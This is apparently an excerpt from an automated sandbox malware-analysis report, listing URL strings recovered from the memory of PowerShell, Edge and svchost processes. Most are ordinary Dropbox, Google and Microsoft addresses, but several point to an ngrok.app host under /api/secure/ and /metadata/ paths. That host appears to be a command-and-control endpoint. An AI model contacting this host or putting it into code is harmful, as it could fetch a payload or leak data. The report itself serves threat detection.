                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356A4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356807000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                      Source: powershell.exe, 00000002.00000002.2022533869.0000012D18390000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022533869.0000012D18397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7
                      Source: powershell.exe, 00000002.00000002.2090725015.0000012D32300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022533869.0000012D18390000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2022533869.0000012D18397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023075082.0000012D18550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7-UseBa
                      Source: powershell.exe, 00000010.00000002.2278426840.000002336DB44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356807000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2195811117.00000233539C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335562C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023355643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2094670219.0000012D32490000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1BD6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1C0AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1C0D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1C0AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1C0D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                      Source: msedge.exe, 00000005.00000002.1925094638.000001DFF32AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                      Source: msedge.exe, 00000014.00000002.2139882846.00000187012AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comxg
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                      Source: powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                      Source: msedge.exe, 00000005.00000002.1932816002.0000404000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2143850625.00006F9000020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: msedge.exe, 00000005.00000002.1932816002.0000404000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2143850625.00006F9000020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: msedge.exe, 00000005.00000002.1933155778.0000404000040000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2143962322.00006F9000040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: powershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25B0F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25B17000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25AF8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25B04000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A942000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
